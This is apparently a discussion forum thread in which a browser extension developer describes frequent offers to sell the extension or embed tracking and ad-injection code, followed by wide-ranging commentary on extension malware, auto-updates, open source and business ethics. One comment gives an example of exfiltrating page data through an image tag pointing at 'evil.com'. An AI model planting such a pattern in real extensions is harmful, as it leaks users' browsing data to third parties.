As the developer of a pretty popular "utility" browser extension, I've been shocked by the volume of email I get every week about it.
On a daily basis, I will get requests to sell the extension. Once or twice a week, I will receive an offer to add "a couple lines of code" to my extension which are always generously described as "allowed in the Chrome Web Store" by little fly-by-night organizations that only even have a landing page half the time and usually have throwaway-looking gmail accounts. Out of curiosity, I've asked a few what their code does and they never fully describe it, but it either collects analytics to ship home (my extension runs on all sites, so it's appetizing to them!) or places paid results at the top of any search results, for which I can make "thousands of dollars a month based on the number of North American users I have".
Here is an example email I received yesterday. It's a good example of how they call it "an SDK" and looks like one of the more legit ones (they registered a domain to send email from, at least).
We at [redacted] are considering purchasing the complete license and ownership of the extensions which have 50K+ active users, may I know if you would be interested in selling? If so, - what is your estimated price?
Regarding the SDK monetization which we discussed earlier, as it is not distractive and is compatible with any other monetization. We have straightforward terms and provide support for your users agreement. Our partners generate 3-20 K USD monthly with our solution for the browser extensions.
As a kind reminder, we are [redacted] — a reputable global peer-to-peer ethical proxy network. All our clients are big reputable companies, we authorize their business before providing any proxy plans.
Look forward to your further feedback and discussing further details of our financial proposal for your Software in a short Zoom call or here by emails.
Finally, I am also hounded by teams at Microsoft and Apple, who want me to port the extension to their new plugin ecosystems so it can be featured/showcased. I worked with Apple on one similar thing for an extension and it caused such a huge jump in support and feature requests from users that I was overwhelmed, so I am not keen to do it again until I have more free time. They can't understand why I don't want to grow by tens of thousands of users a week, but I'm just one person and don't make money from it whatsoever.
First, respond to every inquiry by telling them the price is USD$70,000,000.00. And stick to that price. Many of these sleazy companies get their leads from the same "lead generators," who will eventually take you off their lists because they know your terms are unreasonable. It doesn't work for everyone, but when I did it to spammers trying to buy my mailing list, it significantly reduced the volume of inquiries.
Second, put a page on your web site listing all of the offending companies, with links to the letter you received.
Apr 1, 2021 - Company X promised $3-5k/month if I alter your search results. Link.
Apr 3, 2021 - Company Y promised $1-5k/month if I promote thier product on other people's web pages. Link.
A lot of people on HN will claim "O, noes! Lawyers! Libel!" I wouldn't worry about it. These people don't have the money for lawyers, are usually in geographies without legal systems, and don't want their names and other information exposed in a public legal filing. Plus, all you're doing is stating facts.
Every time they make a lower offer counter with a higher price. They will soon learn what kind of person they are dealing with.
If they actually do come up with $120,000,000 - will at that point nobody will be surprised that you cashed out. They might be mad, but they won't blame you.
Case in point: Notch once said that his price for selling out Minecraft was $2B. When Microsoft eventually said "sounds fair" and gave it to him very few people found it easy to be mad at him.
People got mad at Notch for internet-age old reasons: expecting someone with high technical skills in one domain to have the right takes on social and political issues because they're now a internet social presence in addition to whatever creative work they've done. If people were realistic in their expectations of Notch, they'd never have been mad in the first place because they wouldn't have cared what inane ideas he spouted.
I don't think people on the internet are expected to "[take] on social and political issues"; they are expected to not be a piece of shit though. It costs $0 to not be a dick on the internet. It's free to not voice your opinion. You're not less of a person if you self-censor.
They are paying for the brand, not the product. Microsoft is ensuring that they have mindshare in the next generation of gamers. That's critically important to maintaining their ongoing success in the gaming sector.
Similar to why Disney paid billions for Star Wars: the company was easily capable of replicating the product; the issue was replicating the brand. That brand has a proven track record of multi-generational appeal.
I think it's more than just the brand right? I can't speak for Disney and Star Wars because Star Wars was never my thing.
These creative endeavours have a soul, or an essence, for want of a better term. You can replicate a game or a movie and it will feel utterly soulless compared to the original, even if you can't visibly notice a difference.
You could reproduce Minecraft but even the most infinitesimal divergence from the original will make it feel fake. Maybe the controls have a different 'feel', or the way the scene is rendered feels a bit off. It's just not Minecraft any more. There are just so many quirks and details that will be lost in the translation, or even patched over if they're seen as bugs.
It's no different if you ported a game from Unity to Unreal and then to CryEngine. I'm sure that with a blind comparison you would be able to 'feel' the difference.
And the same for films. The way these things were created has a lot of influence over the end result.
On the other hand, it's exactly what can make a remake or remaster so successful. The Resident Evil 2 and 3 remakes that followed Resi 7 were phenomenal! Not totally faithful to the originals, didn't try to be...they just took an older game and gave it a new life.
People don't go to Starbucks because it's the best, they go to Starbucks because mocha frappucinos in Lima and London taste exactly the same. Any divergence, even an infinitesimal one, makes the frap feel fake.
Sure, marketing is important. But the "secret" ingredient is coca leaf extract. The actual cocaine is used to make various drugs by a different corporation.
According to Business Insider, the beverage company has a deal with the Drug Enforcement Administration to get coca leaves so that the world can get its Coca-Cola fix. The DEA lets Coca-Cola import coca leaves from Peru and Bolivia in order to get the part of its secret recipe, which it hides behind the term "natural flavors" on the ingredients list.
Which can be done, but it is a long process. Most attempts only get a fraction of the big brand, and the exceptions generally have more to do with the failings of the big brand than the competition. Once people find something they like, as long as that thing doesn't do something stupid they won't be in a hurry to look at the competition in general. If there is any switching cost they are even less interested in trying something else. Which means that the not number one competitors need to be perfect in everything - which is hard when they are not getting as much revenue to begin with, and thus cannot afford to try out any seemingly good ideas that turn out bad only after you try them...
Well yeah, but they could use the brand, likeness and source code of the original; if they created a clone (and there are clones, hundreds of them) it would NEVER have gotten even one percent of the share. Plus there's the merchandise. There is an existing market for Minecraft merchandise, and a clone could never even get close to that network.
My buddy loves buying and selling stuff from the local newspaper. Whenever people give a low ball offer he looks them directly in the face and in a very confident manner says: "I'm accepting asking price or anything higher!"
I sold a Chrome extension I wrote in the early days of extensions (for a lot less than $120M and with a lot less users, but meaningful numbers for both). It wasn't clear then just how bad the malware problem was.
In the joke, $1m was offered. I don't know when he made that joke, but since he died in 1948, that's somewhere over $15m now. And houses were ridiculously cheap by modern standards, so that would have been retirement money for sure.
There are differences: in the USA the statement is assumed true, and must be proved false if libel is to succeed. In the UK the statement is presumed to be false, and the libel will succeed unless proved true.
I wonder what the GDPR has to say about publishing a private email?
The difference on the UK really comes down to the cost of defending oneself. Engaging in a court case is not a costly undertaking and this would likely be a quick in-and-out case, as long as you have the evidence to backup their claims.
I imagine either party in an email conversation have the right to publish the email, unless some terms were agreed in advance or the subject is expressly personal.
AFAIK, for ordinary snail mail ownership goes to the recipient in most (all?) European countries: You can't claim copyright on a letter you sent to someone else. Can't see why the same shouldn't go for e-mail. If you wanted something to remain “private”, don't give it to someone. (At least not without having them sign an NDA first).
I also have some extensions with users in the tens of thousands and can corroborate all of this. Out of curiosity I strung one "buyer" along to see how much they would offer and they quoted $0.20 per user. With the amount of money being thrown about, as sad as it is, it's no surprise that some devs end up selling out their users.
In my opinion extensions have to be one of the worst sources of spyware these days. I am now extremely conservative with what extensions I use, and definitely would only use extensions from open source projects or companies that I trust.
Something needs to change. As long as extensions have such weak sandboxing along with such poor app review, Google/Mozilla etc will keep willingly shipping spyware unbeknownst to their users.
At least some mechanism of creating and verifying reproducible builds would go a long way.
"In my opinion extensions have to be one of the worst sources of spyware these days. I am now extremely conservative with what extensions I use, and definitely would only use extensions from open source projects or companies that I trust."
I completely agree. There are a number of features I would really like to use in Firefox that are available only as extensions and I continue to resist installing them.
In fact, the only extension I use is uBlock origin - which is based on a fairly rich social and community history behind that project and its author ...
More and more I feel like we need another new manifesto.
We need to pull people together who have a passion for making the world's computers just work and build a brand around simple extensions and apps that are TRULY FREE. As in, they don't have features removed that you can only unlock through a paid version, they don't have ads, they don't sell tracking data, source is open, and anyone can support them through optional donations, but they don't nag you for anything.
Stallman distinguished between free as in freedom and free as in beer. I don't think he went far enough.
I'm more radical because we are users first, all of us, and only by using great software are we able to be makers.
And I think about my typical experiences as a user. Often, using a piece of software that was pretty great, then suddenly out of nowhere, a popup, it was a free trial and the full version costs some exhorbitant amount. Or the software that was suddenly bought out and shut down. Or the "five star" app that is already full of spam.
Then I contrast that with those programs that just don't ask for anything. You keep expecting it, but it's just genuinely something truly free that works. They weren't optimizing revenue, they were optimizing function. That feeling of finding that perfect FOSS or community developed app, it's just sublime.
Some user had a problem they wanted to solve, once they solved it, it was just a gift to the world, implicitly asking people at most to think about paying it forward.
We should make stuff that emulates our ideal experiences, not our worst experiences. We should spread that same kind of joy we've felt. If one in a thousand pays it forward, the options spread. The oak tree doesn't waste time trying to extract revenue from every squirrel, it knows one in a thousand will bury an acorn somewhere and build the forest.
And it's especially needed now. There was a time in the early internet where there was just abundant freeware on the internet. Postcardware, donationware, people genuinely trying to make an entire open source ecosystem.
Then we got app stores. "Curated," but not for that ultimate sublime user experience. Curated for sustainable profit back to the marketplace. Curated to make the biggest revenue earners find the exact bottom line of scumminess without getting banned, and encourage them to duplicate that model, then inspire copycats flooding the entire app ecosystem.
I know the rebuttal, devs need to get paid. Sure, I'm not an absolutist; this path isn't for everyone or every project. But I've worked with some people who make many of their contributions as free as possible, and they include some incredibly talented and hardworking folks who might be a little bit crazy. The thing that unites them all is that they're passionate about making the world a better place. They are lucky to have the freedom to do it, but it's still praiseworthy that they use that freedom for everyone, when it'd be easy not to bother.
I know there are free cycles in the system out there where people code out of a desire to help. Just need to have a unifying purpose, a call to action, that's how so many of the great movements like open source originally started. Just have to have 1% of people believe in it, then so many incredible things happen.
Absent any counterargument, I stand by the premise that app stores and extension marketplaces are teeming with junk, that curation has failed as a model.
It wasn't always like this. It doesn't have to be like this.
We just need to build something better.
Maybe the above path isn't the way. Ok, what do you think would be a better way to fix the current system?
If you can make thousands a month on tens of thousands of users, that’s (very much ballpark) $0.10 per user per month.
Paying $0.20 per user to buy that seems extremely low.
Also, on the sandboxing/app review of extensions, does anybody know how well Apple vets Safari extensions? (I guess that could be hard if the evil parts are time-triggered, certainly if the code also is obfuscated (possibly in the name of minification)
If the malware seller can make $0.10 / user / month, then paying the extension developer a one-time fee of $0.20 * users is only three months to pay back. Thus considered a low price for the extension developer but still attractive to the extension developer who likely earns $0 / user from their extension.
He didn't ask about the math, he wanted to know where it was said that they could earn "tens of thousands" (and I believe that is stated in the middle of the root post of this thread)
With that kind of money being offered (assuming it is in the ballpark of true)... I wonder how many popular free extensions already have some of that junk in it and nobody's noticed. Maybe many of them? I could see a lot of devs who started out writing an extension as a non-paying hobby, having trouble turning down the free money.
I feel like this is another prong in the story about threats to sustainability of open source done the way it used to/has been done previously.
Some years ago I applied at a "data analytics" startup founded by a locally famous founder. Their official purpose was something something search something social media. Not in the US, but he was featured on our local version of Shark Tank at some point.
During interview it became clear that their "product" was actually bundled malware that replaced google's and other ads in the browser. Evidently hot founder guy was using this startup as cash cow for his other ventures.
There was some noise in the press about it a couple years later and founder guy defended himself saying he sold the company and wasn't responsible, except it was already malware when I interviewed and he was still owner so I know it's bullshit.
What makes ad replacement malware? Presumably the users don’t care as long as the replacement ads aren’t of horrible quality. It’s definitely a bit cheeky, but malicious? I don’t think so.
This seems like a fairly benign monetization scheme, it’ll hurt some sites that depend on ad revenue but not any more than adblockers.
I fell for one of these offers on the first thing I made that got any traction -- it was a browser extension that solved an issue with a common photo hosting site, and I organically ended up with 25,000+ users, mostly on Chrome.
Eventually the photo hosting service itself solved the problem that my extension was solving, but pretty much everyone who'd installed the extension still had it installed.
At some point, a company offered to buy it from me for a couple thousand dollars -- I was 18, and it seemed like a miracle! They asked me to add some code to the extension, and I assumed their intentions were good. I added their code, which I now realize was some sort of tracking/advertising program...and my extension promptly got taken down by Google.
No, but Apple and MS both consider the increased visibility and growth in user count from being "featured" in their marketplaces as a nice bonus for the developer. If I were a business generating revenue from app subscriptions, I'd jump all over it.
If you are generating revenue exposure can be very useful. However if you don't already have a good business model it just digs your hole deeper. Be very careful to be sure which you are in.
It’s a frighteningly common invit^H^H^H^H^H^H exploitation providing free labour to owners of gathering places benefitting from that labour (like bars and browsers and operating systems and social networks, etc).
It's not an iron-clad given that the musician provides value to a venue.
Musicians who are confident they can bring business to a venue negotiate with confidence and get paid.
Those who play for free are ones who don't have that confidence.
What you accept is what you cost. That's the market rate.
How about this argument. Say I have a restaurant. Typically that means there is some landlord, and I pay them utilities and rent in exchange for using the space. Now some guitar-strumming, crooning ape wants to perform in the same space. If he and I are to be considered part of the same organization, we are on the same level of the "org chart". We are sharing the space and doing our thing. Why would I pay him anything? He should pay part of the rent and utilities. Or, why not the other way around?
Let's reverse it. Suppose a musician has a venue where he performs every night, and people come. Paying people. Suppose I want sell hot-dogs and sandwiches there, and he lets me do that. Why the fuck should he also pay me anything? He would be right to ask me to pay some sort of rent.
Now if I give the hot dogs and sandwiches for free, so that many more people come, and those people pay to get into this music venue, then there is a case that I'm increasing the business, and doing it out of my pocket. Still, that is my problem; I shouldn't be doing such a thing. Maybe I know what I'm doing! Or maybe I'm trying out new product to see how people like it or whatever (market research).
Context matters: It's a very different dynamic, depending on who approaches whom.
If the venue owner does the approaching (as in the context of the post raising this sub-thread) like Apple, Microsoft or Google approaching extension developers) it's questionable.
If the musician (or the extensions developer) approaches the venue owner, it's an entirely different story.
One has exploitation written all over it, the other not so much.
The context of the great-great-...-parent post suggests the exploitative version.
> How about this argument. Say I have a restaurant. Typically that means there is some landlord, and I pay them utilities and rent in exchange for using the space. Now some guitar-strumming, crooning ape wants to perform in the same space. If he and I are to be considered part of the same organization, we are on the same level of the "org chart". We are sharing the space and doing our thing. Why would I pay him anything? He should pay part of the rent and utilities. Or, why not the other way around?
Owners are allowed to do a lot of things that would be considered exploitative in an employment relationship: they can work excessive hours, below minimum wage, etc.. If they're a genuine owner getting their share of the upside, it's fair enough.
> Now if I give the hot dogs and sandwiches for free, so that many more people come, and those people pay to get into this music venue, then there is a case that I'm increasing the business, and doing it out of my pocket. Still, that is my problem; I shouldn't be doing such a thing. Maybe I know what I'm doing! Or maybe I'm trying out new product to see how people like it or whatever (market research).
You're not allowed to do form relationships that are indistinguishable from illegally-exploitative employment, for the same reason you're not allowed to run the shell game even if you do it 100% honestly. You'll find a lot of similar rules around charities that don't make sense on the surface, but are the only way to have a regulatory regime that protects people: you're not allowed to volunteer for or donate to the same organisation you work for, volunteers aren't allowed to be paid, volunteers can't do the exact same activities that they do for the charity but for a non-charity business...
As the other commenter said, the venue owner should pay the musician in the context provided by the parent poster, because the venue owner is the one asking the musician to play at their venue. Context matters.
The situation being called out, is the very situation that flows from your hypothetical restaurant owner's contemptuous disregard for the "guitar-strumming, crooning ape".
If a venue representative passes a hint to some musicians that a free space for jamming is available certain days of the week and certain hours, with some sound equipment and possibly an audience, is that an invitation which obliges them to pay the musicians? Certainly not.
The one thing that makes the context different is if the venue wants very specific musicians, and all of their choices are pros who expect to get paid. The venue can't get any of the musicians it wants without paying and that's that.
If a venue is not picky about musicians, it can easily get free ones. So many free ones that if three of them cancel, it can still call a fourth to come over.
> and all of their choices are pros who expect to get paid
I disagree that an alternative exists. Pay them for their time. They're enriching your business, or at the very least, providing you with their time and expertise.
> If a venue is not picky about musicians, it can easily get free ones
The way you talk about musicians (see also; you "ape" comment earlier) sounds like you don't value them as people.
> They're enriching your business, or at the very least, providing you with their time and expertise.
What? Not necessarily at all. Say I have a bar that is completely dead on a Wednesday night, due to it being Wednesday night and it being in some off part of town.
I could advertise that I have some free jam space for musicians, a drum kit and a PA with a few microphones and maybe some guitar/bass amp or speaker cabinet. Maybe people will show up to make some noise. Those same people (and maybe a few of their friends) will buy a few drinks, and that's where the "enriching my business" part comes in.
Nobody is required to buy a drink, and so this is a better offer than them having to actually rent equipment and room.
Your analogy only works if in the first case it's the musician who pockets the entry fee. Or, in the second, the payment for the food. The second, you specified they didn't (you “sell” the hot dogs, i.e. presumably pocket the payment yourself). The first is usually not the case.
But the implied flow of money doesn't follow from that.
Suppose I own an empty space with a little stage, a PA sound system, and some 100 chairs. I put a down payment on this place, paid for equipment and upgrades and have to pay property taxes, utilities and mortgage. If nothing happens there, I lose money out of my own pocket. I intend for it to be a music venue. I meet the definition of a music venue owner.
Some musicians have contacted me and would like to have a concert there.
Should anyone pay anyone? Who should pay whom?
How is this for logic: "A house isn't a home without a family! If you want me to move into this house with my wife and three kids to make it a home, you're gonna have to pay me!"
For many musicians it is not a career, but a hobby. A outlet for creativity. (That is me) In which case we choose venues that are like us. Our most recent gig was at our local Musicians Club https://youtu.be/URwzKL8pjQo?t=819
For others it is a important part of their income, so they should be paid.
Who should pay? If the punters pay a door charge the band should get it (that is the tradition here) if not then, yes, the owner of the venue pays it.
I disagree with this sentiment. People go to a music venue for the music, they go to a bar for the drinks and a resturant for the food.
If the bar had no drinks, it could hardly be called a bar. Similarly, a resturant with no food is hardly a resturant.
In that meantime, where the reason to go there is missing, these are all just rooms with the potential to be something later. The same goes for the music venue; it's just a big room that could be a music venue if there were actual musicians there.
A dive bar is still a place where people pay for drinks, and not for music.
The "open mic" is on Tuesday nights, because nobody goes there then, so there is no harm to the business, and the people who come to have open mic fun might buy drinks.
For a couple projects and apps I worked on, exposure in one of these stores would be worth a decent amount of engineering effort. You can convert that exposure into users, marketing "buzz", validation of the apps worth to third parties, etc.
This isn't universal, of course. But not all payment comes in liquid form!
Do extensions require any permissions to make requests? It seems like a strict sandbox that prevents data from flowing out of a page via an extension would help, if the extension is something like a JSON renderer.
Most extensions need the ability to modify webpages. With that ability, they can easily exfiltrate data by for example adding a <img src=evil.com/?data=82374682376>.
Trying to sandbox an extension that can modify arbitrary webpages in arbitrary ways is near futile.
Trying to sandbox an extension that can modify arbitrary webpages in arbitrary ways is near futile.
Just don't let them create script elements, or add any URLs that don't come from within the extension bundle itself. Browsers already have to do a ton of bookkeeping to track the origins of requests anyway. Doesn't seem hard, you just have to be thorough.
Yes, but you could strictly limit which extensions had that permission, make it a site specific permission, etc. Auto disabling an extension that changes to require that permission would be a start.
The monetisation angle is hard. As soon as you activate it then the expectations ramp up even more than the (likely) current flow which is likely non-trivial right now as it stands. My experience on a smaller scale was only tens-of-emails per day. And that was actually overwhelming for my little hobby that had no possibility of monetisation. The idea of thousands of support emails from people with expectations doesn't spark joy at all.
Rhetorical questions:
Do you want to support this thing? How much time does it take? Is this effort you want to spend? Are you not monetising this for a purpose? Are you happy with that purpose (obviously yes)? Do you still enjoy spending time on it? Do you see that time as well spent? Are the expectations from your side still being met? Are the expectations from everyone else still reasonable?
After all those questions, the basic answer is probably: you don't want to monetise it because it will wreck the actual purpose for which its intended or alternatively there isn't much of monetisation possibility due to its nature. But you can't spend more time on it because you have other Things to Do, like making money from other ways.
(At least this is my impression based on my experience)
It'd be annoying for the poster if they got mad, with an unlikely but potential legal encounter involved, and 99.9% of the community will never interact with the company. Even the few that do would likely realize their scummy business strategy immediately. Not worth it here.
> so I am not keen to do it again until I have more free time
Aww man, I'm really sad to here that RecipeFilter won't be coming to Safari anytime soon. I really got my hopes up after it was in the keynote!
Since Apple distributes extensions in the App Store, have you though about charging a buck or two for the Safari version? I know everyone says this, but I'd pay...
> Finally, I am also hounded by teams at Microsoft and Apple, who want me to port the extension to their new plugin ecosystems so it can be featured/showcased.
Do they ask you to do that for free or is there a monetary amount they tack on?
Make sure your email account and browser extension accounts are secure... if you're a valuable target for scammers, you're also a target of getting your browser extension stolen from you.
I feel there's a moneymaker here - create a popular open source extension, sell it off when you get a good deal, fork the code and let everyone find out the old version is "evil".
"Trust for software" is largely reputation based - I don't have the time to read all the code to Blender; I trust that Blender.Org people are Nice TM or that at least someone Nice TM has read the code.
Once you burn your reputation by "selling out" the first time. Who will trust your new forked version?
Going one step further, I found AnyList[1] on this forum awhile back and they also have a similar extension for extracting recipes from awful blogging sites.
The added benefit with AnyList is that you can import ingredients directly into your grocery list from the extension. Been a huge time saver for me
Paprika [0] can also parse any blog/recipe site and import the recipe. Then you can add items from recipes to your shopping list. I highly recommend this app, I've converted many friends over to it. It's a much better experience than trying to scroll through a blog post while cooking.
I'll add that I recently found how well Paprika handles printing recipes you have in your library. I wanted to print off a bunch of recipes to put in a binder and was very happy with how clean and simply formatted each recipe was, often with room to write notes on the paper. My only wish is they would implement a "family" option where I could easily share my library of recipes with my girlfriend without having to share them one at a time.
> My only wish is they would implement a "family" option where I could easily share my library of recipes with my girlfriend without having to share them one at a time.
I normally abhor "social" features being tacked on when they aren't useful but I'd pay for all the apps over again for this feature. Thankfully the API is pretty straightforward. This repo of mine [0] is super dated but it was still working the last time I played with Paprika's API.
I've toyed around with setting up a little web app that my friends can log-in with their paprika creds (I know, I know, but I'd tell them to use a 1-off password for this) so that they can use the web app either push or pull recipes from each other.
Thankfully you can send the full paprikarecipe file via email and import it but it's a little clunky and things like Discord (which my friends use to chat) doesn't like file extensions over 12 characters (IIRC) so it just cuts off the rest of the extension characters leaving you with a file you can't open (without fixing the extension). I have some initial work to setup an AWS SES address that people can send recipes to that will then drop a preview and link to download (not an attachment, it would be hosted on S3) the recipe into a "recipes" Discord channel we use but it's still a WIP.
> My only wish is they would implement a "family" option where I could easily share my library of recipes with my girlfriend without having to share them one at a time.
My wife and I work around that by simply using the same paprika account for cloud sync...
Paprika is a huge time and sanity saver for me - it'd be totally possible, but much harder for me to cook for big events without it!
I love Paprika, my one complaint about it is that you have to be careful with the ingredients multiplier feature. It only touches the number at the start, so "1 large onion thinly sliced, about 2 cups" turns into "2 large onion thinly sliced, about 2 cups."
If you're not paying attention you can miss that it really needs 4 cups.
Agreed, I've run into the same issue. I had hoped that the numbers row they show above the keyboard (on mobile) meant they were "special numbers" that would scale but alas it only scales the first number AFAICT.
> My only wish is they would implement a "family" option where I could easily share my library of recipes with my girlfriend without having to share them one at a time.
I thought that was the paid Cloud Sync feature was for. Does it not work for that?
I'm pretty sure Paprika Sync is free (with purchase of app) but yes, if you login to the same account it will sync (I used this with my partner very successfully). I think the person you are replying to is talking about having separate Paprika Sync accounts but still being able to share one-off or a subset of recipes.
Paprika is so good! There are a bunch of fit-and-finish details that tell me that it's being made by people who use it and who really care about listening to users.
Thank you for sharing this, fancy_pantser. Are you the current maintainer also, or the current developer?
This is what capitalism looks like, folks. Someone "built it" so they now privately "own it", no matter how big it gets. It's not put into the hands of an organization. The profit motive is quite strong, which is why someone can be "corrupted" by very tempting messages like this. If you had a lake or a forest privately owned by one or two people, and they had a lot of debts, they could easily sell it to polluters and loggers.
Some people scoff and say "socialism has been tried, it never works." I admit that socialism simply trades one class of elites (the capitalists with a lot of shares) for another (the bureaucrats with a lot of political clout). BUT! I would like to say that socialism is not the only alternative. The other alternative is decentralized systems with no private ownership. I'm talking about science, open source software, and so on. There can be a Merkle tree of version updates (e.g. git version control) and each one can have various reputable organizations (like Zagat for software) building their reputation vetting it. Then, each community would run their own app store (think Wordpress plugins) which would work with these reputable organizations. There would be no heroes, no celebrities, no tweets at 3 am to 5 million people, no pulling from repos without peer review, no scientists instantly believed after publishing on arxiv.org .
Congratulations for building a popular extension, fancy_pantser. You live in a world where you it's really bad to "criticize the profit", and where building it means you are responsible for it no matter how big it gets, but then we are all depending on your integrity and ability to rebuff life-changing amounts of money to not mine our data. We can pass laws to punish people after the fact, or we can gradually change our culture by rejecting "immediate gratification" of updates that are not vetted, just as corporations have done with bleeding edge vs stable Linux distros etc. Unfortunately, the Web has made it so that anything can be updated at any time, with no sysadmins or reviewers in the loop. It's a wonder more malware isn't silently everywhere already.
Not open source. Open source is a resounding success. The marketplace with the problems is advertising. We need to enact laws banning selling of third party data and make leaks a liability (perhaps even one that automatically pierces the normal corporate veil and opens VPs and up to personal liability if there was any circumvention initiated encouraged by them). Then businesses have to actually decide if the liability is worth it for them vs a free-for-all market that intelligence agencies and criminal enterprises are primarily funding.
All of it is, otherwise it wouldn't meet the 4 freedoms that define open source.
The 'project' maintaining the software may be centralized, but all its users "own" the software in the sense that the don't need to ask permission to the maintainer, and they can create their own modifications.
You're mixing a few different things. Free software and open source are different. and for each of them there are hundreds of different licenses that allows you to do something but not another.
Free software and open source are different marketing strategies for the same concept. The most commonly understood meaning for both terms is the same, from the very moment the Open Source Initiative was created.
As well as science, language and other human endeavors. No one is in charge! I’m glad society advanced so much from secret alchemy cults with their “intellectual property” protections on their secrets.
Ah, yes, the little project known as Debian completely failed and never took off. Anarchy is so bad. How could it ever produce anything of value, like say the world's most used linux distribution?
You can have each individual community choose what OpenStreetMap tiles to use, what to censor etc.
Like HN does. What if HN was kicked off a host? They would put the backups somewhere else and repoint the DNS.
What if ICE seized their domain? Then we could move domain name resolution to a DHT.
What if AT&T refused to carry it or charge extra? The signal could route packets along other lines. No single point of failure.
It’s not just about banning 0% or 100% but the prices and friction imposed by privately owned rentseeking infrastructure monopolies. Why in a span of less than 10 years, VOIP has caused international calls that used to cost $3 a minute to turn free and have video!
The weird thing is that when A wants to connect woth B you think there has to be a one-size-fits all C that can block it.
It seems you've misinterpreted the poster's intentions as if it should be illegal for a developer to do this. But he/she was merely informing users, and well informed customers is a requirement for capitalism to work.
The cost of using this extension is your information, and there are other products available that do the same thing at a lower cost. Based on the most fundamental concept of economics (supply and demand), "The Great Suspender" should fail as a product very quickly.
It's incredible how much downvotes you got for this without any explanation. Your proposal sounds sensible and I agree that we need to find a new system. It doesn't have to be this that you described but we should be open to change. Capitalism the way it is leads us in the wrong direction and socialism doesn't fare too much better in practice. We need to redraw a plan for the 21st century
Discouraging political discussions is a very political thing in itself. The comment we are discussing might not be a great example of encouraging curiosity, but being the person that says "don't be so political" is complacent and ignorant. We arrived at the current situation due to political decisions and a political process.
I am not accusing you of being that person, not anyone else. I am just tired of people not seeing that upholding the current situation is as political as criticizing it. This discussion made me try to put it in words.
But part of a curiosity-based discussion is also trying to satisfy the curiosity of others by providing answers. The most insightful and thought-provoking of those can sometimes be rather “political”, because the things we think about and are curious about are.
this doesn't read like a battle, though. one could argue that opinions that run counter to the generally accepted norm are inherently good for curiosity.
It is indeed incredible. As I said, you cannot “criticize the profit” in the USA without losing social standing. Capitalism is a national religion because people think the only alternative is socialism (collective ownership of the means of production - which btw isn’t scary on small levels) and the USA fought a cold war with USSR for decades.
That’s why there will be a third party in the USA that unites disaffected progressives on the left with disaffected paleoconservatives on the right. A lot of people are fed up with the divisions.
I welcome counterpoints and debate but as you can see — there are just silent downvotes instead
You're probably being downvoted because even if your critique might be thoughtful at some parts, it is also quite snarky and smarmy at the beginning, and sounds like it's posing an ideological battle. Starting at the third sentence, "This is what capitalism looks like, folks." In fact, you're still doing it, "Capitalism is a national religion..."
Do you think people on HN want to engage with your comments when you're saying they're foolishly clinging to a religious belief?
By the way, this was a decent point: "[W]e are all depending on your integrity and ability to rebuff life-changing amounts of money to not mine our data." Maybe this thread would be different if you stayed with points like that instead of accusing people of harboring religious beliefs that pulls the wool over our eyes, preventing us from seeing things your way.
> Do you think people on HN want to engage with your comments when you're saying they're foolishly clinging to a religious belief?
To be fair you inserted "foolishly clinging", and are now blaming them for something they did not actually say.'
Capitalism is highly akin to religion - they're not the first and will not be the last to draw that comparison, and plenty of words have already been written on the topic. If your response to reading "capitalism is a national religion" is to assume you're being insulted, perhaps consider that the statement may be more true than you think.
This is really Google's fault. They make it impossible to turn off automatic updates for Chrome extensions from their store. That would be kind-of-ok if they actually had a rigorous approval process. But they don't. The Chrome Web Store has become one of the prime Vectors for malware.
The only way to be safe is to exclusively download releases from the extensions github repo and to manually install them.
In general, taking control away from users sets up all kind of bad incentives. For example, automatic updates with no way to downgrade save vendors from having to compete with their own older versions. This means regressions in functionality or design can be pushed out with little recourse for users other than complaining online. This is compounded by ecosystem lock-in and lack of data portability. The software industry as a whole is heading towards treating users more and more paternalistically.
Conversely, before automatic updates web developers were stuck supporting Internet Explorer for the best part of twenty years. Many of the people using it had neither reason or knowledge to update it, and it became the reason my parent's computers got riddled with malware.
There's a sensible middle ground here. Take the paternalistic approach that (generally) protects people like my mum. Add settings that allow people like you and me to turn off updates or roll backwards. Push the people controlling the updates (like the Chrome store) to better protect their users.
Users need to be motivated to upgrade. If their current software works sufficiently on the sites they care about, then they have no need to upgrade. If the sites themselves are enabling this behavior, by bending over backwards to work on with old browsers, then they are part of the “problem”.
I don’t like automatic updates and generally keep them disabled. Software upgrades tend to reduce functionality and instead force unnecessary UX redesigns on users, so I’d rather avoid them. I wish developers had the [EDIT: incentive] to release security patches independently from functionality changes, but few do that anymore, sadly.
It's been an age since I've worked in an agency, but back in the IE era, at least once a month a dev would ask to use a 'modern feature'. Something to support some a new piece of design from the design team, or save hours or days of dev, or remove the need for hacky 'fixes' that could be done cleanly with modern browser support.
So off to analytics they would go. "X thousand users are using IE8. We're converting at X%. Removing support for IE8 just means these people will shop elsewhere and we'll lose X thousand pounds a month. You need to support IE8."
Believe me, I wish it was as simple as saying developers are "part of the problem," because it would be an easy fix. But try selling that (without a huuuuge struggle!) to the person who holds the purse strings.
Sadly the new features usually only came on new sites. It's much easier to push it through when you're not cutting off an existing income stream.
Despite automatic updates, web developers are still stuck with Safari, IE, old android browsers and old edge. Automation doesn't help with bugs and functionality if there are just no updates to be installed that fix bugs and bring new functionality.
>Conversely, before automatic updates web developers were stuck supporting Internet Explorer for the best part of twenty years. Many of the people using it had neither reason or knowledge to update it, and it became the reason my parent's computers got riddled with malware.
The failure is not that of Internet Explorer, but rather the OS in which it runs, which has a faulty security model. No operating system should trust executables with everything by default.
I would say that "protecting users from applications" (or at least, external attackers) has been commonplace for maybe even two decades now, ever since major malware 'plagues' of the early 2000's (pre-SP2 Windows XP) like Blaster or Sasser.
That said, in that era it was often assumed (more so than now) that software the user installed himself is trusted.
The major problem with internet explorer was that it was impossible to update without updating windows which costs money so most people and organizations didn't do it.
I don't mind automatic updates per se as long as they're thoroughly checked and vetted. I'm not convinced Android and the Chrome web store do ANY checking / vetting. I have more trust in Apple's stores.
Vetting could be better with a lot of companies as well; remember not so long ago when Windows Defender decided a critical system file was malware and broke a ton of systems?
Verification. Vetting. Gradual release. Automatically disable extensions if they changed ownership, or if there's suspicious activity on the account of the owner (e.g. new login in another country).
And they need to take a MUCH harder stance on malware. Right now they're not even acknowledging there's a problem, let alone acting on it.
For any extension that makes any money, the solution is a deposit scheme.
"Google will withhold $1 per user of your ad revenue forever. If your extension is found to contain malware, you forfeit all the $1's. Decisions on malware'y ness shall be made by XYZ malware researchers."
Allow a developer to get back their $1 when a user uninstalls the extension, or the developer stops making the extension. Also give the developer a certificate anytime showing how many $1's you hold of theirs (they could use that to get a loan from someone willing to trust them not to distribute malware).
